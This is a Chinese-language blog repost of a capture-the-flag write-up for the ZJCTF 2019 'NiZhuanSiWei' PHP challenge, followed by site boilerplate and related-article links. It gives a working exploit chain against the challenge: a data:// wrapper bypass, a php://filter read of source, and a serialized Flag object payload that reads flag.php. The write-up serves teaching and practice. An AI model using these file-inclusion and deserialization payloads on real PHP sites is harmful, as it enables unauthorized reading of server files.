[ZJCTF 2019]NiZhuanSiWei

这篇具有很好参考价值的文章主要介绍了[ZJCTF 2019]NiZhuanSiWei。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

信息收集

代码审计

第一层

第二层

第三层


信息收集

打开页面又是代码审计

代码如下

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?> 

代码审计

第一层

通过data伪协议模拟打开text文件

?text=data://text/plain,welcome to the zjctf

第二层

通过filter伪协议读取useless.php

file=php://filter/convert.base64-encode/resource=useless.php

进行base64解码后得到useless.php的内容

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

第三层

看样子是利用反序列化

  • poc

<?php  

class Flag{  //flag.php  

    public $file='flag.php';  

    public function __tostring()

    {  

        if(isset($this->file))

        {  

            echo file_get_contents($this->file);

            echo "<br>";

        return ("U R SO CLOSE !///COME ON PLZ");

        }  

    }  

}  

$a=new Flag();

echo serialize($a);

?>  

  • 序列化的结果

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

  • payload

?text=data://text/plain,welcome to the zjctf
&file=useless.php
&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

返回结果的源码里面找到flag 

[ZJCTF 2019]NiZhuanSiWei文章来源地址https://www.toymoban.com/news/detail-416471.html

到了这里,关于[ZJCTF 2019]NiZhuanSiWei的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • 信息收集(一)域名信息收集

    信息收集(一)域名信息收集

    信息收集也叫做资产收集。信息收集是渗透测试的前期主要工作,是非常重要的环节,收集足够多的信息才能方便接下来的测试,信息收集主要是收集网站的域名信息、子域名信息、目标网站信息、目标网站真实IP、敏感/目录文件、开放端口和中间件信息等等。通过各种渠道

    2024年02月12日
    浏览(9)
  • 【网络安全-信息收集】网络安全之信息收集和信息收集工具讲解(提供工具)

    【网络安全-信息收集】网络安全之信息收集和信息收集工具讲解(提供工具)

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 工具下载百度网盘链接(包含所有用到的工具): 百度网盘 请输入提取码 百度网盘为您提供文件的网络备份、同步和分享服务。空间大、速度快、安全稳固,

    2024年02月08日
    浏览(17)
  • 网络安全信息收集初探之域名信息收集

    网络安全信息收集初探之域名信息收集

    扫描单个域名 批量扫描域名 oneforall 额外参数 ![在这里插入图片描述](https://img-blog.csdnimg.cn/615763f979ea453091ad715f69980555.png https://crt.sh/ https://search.censys.io/

    2024年02月13日
    浏览(14)
  • 4.1 - 信息收集 - 子域名收集

    4.1 - 信息收集 - 子域名收集

    「作者简介」: CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者 「推荐专栏」: 对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 子域名就是下一级域

    2024年02月05日
    浏览(13)
  • 《渗透测试》-前期信息收集及工具介绍01(信息收集简介、JSFinder、OneForAll)

    《渗透测试》-前期信息收集及工具介绍01(信息收集简介、JSFinder、OneForAll)

    信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进 行。比如目标站点IP、中间件、脚本语言、端口、邮箱等等。信息收集包含资产收集 但不限于资产收集。 1、信息收集是渗透测试成功的保障 2、更多的暴露面 3、更大的可能性 1、主动信息收

    2024年02月03日
    浏览(44)
  • 内网安全 信息收集(收集内网计算机的所有信息 进行攻击.)

    内网安全 信息收集(收集内网计算机的所有信息 进行攻击.)

    在   渗透测试人员 进入一个内 网后,面对的是一片 “ 未知的区域 ”,所以 渗透测试人员首先会对当前所 处的网络环境进行判断,通常的判断分为三种. (1) 我是谁? —— 对计算机的角色进行判断. (2)我在哪? —— 对目前机器所处位置区域的判断。 (3)这是哪?

    2024年02月02日
    浏览(16)
  • 渗透测试之信息收集篇-服务器子域名收集

    渗透测试之信息收集篇-服务器子域名收集

    你可能对某个服务器渗透失败,没有发现入侵点,所以我们可以考虑扩大攻击面,对target.com的子域名 进行渗透,然后横向移动。 使用bbot对目标子域进行收集 https://github.com/blacklanternsecurity/bbot/wiki#installation 关于子域名收集,推荐一篇很好的文章,文章地址:https://blog.blackl

    2024年02月16日
    浏览(14)
  • 关于sql server 2019 安装目录所在分区自动写满的问题

    找到sql server 2019 的安装目录,如:X:Microsoft Sql Server。其中,X:是根目录。 在sql server 2019 的安装目录X:Microsoft Sql Server下,找到路径: MSSQL15.MSSQLSERVERLogPolyBasedump 删除除.log文件外的所有文件。 这些文件是PolyBase 相关服务产生的日志,单个将近500MB。 1.PolyBase用于Sql Server 与

    2024年02月09日
    浏览(15)
  • 一款强大的红队信息收集和资产收集工具(Kscan)

    一款强大的红队信息收集和资产收集工具(Kscan)

    Kscan是一款纯go开发的全方位扫描器,具备端口扫描、协议检测、指纹识别等功能。支持协议1200+,协议指纹10000+,应用指纹2000+,暴力PJ协议10余种。 Kscan能够接受多种输入格式,无需在使用之前对扫描对象进行分类,比如区分为IP,还是URL地址等,这对于使用者来说无疑是徒

    2023年04月08日
    浏览(11)
  • 内网本地信息收集

    目录 内网本地信息收集 一、网络配置信息 二、操作系统和软件信息 三、本机服务信息 四、进程信息 五、启动程序信息 六、计划任务信息 七、主机开机时间信息 八、用户列表信息 九、列出会话 十、查询端口列表 十一、查看补丁列表 十二、查询共享列表 十三、路由信息

    2024年02月04日
    浏览(9)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包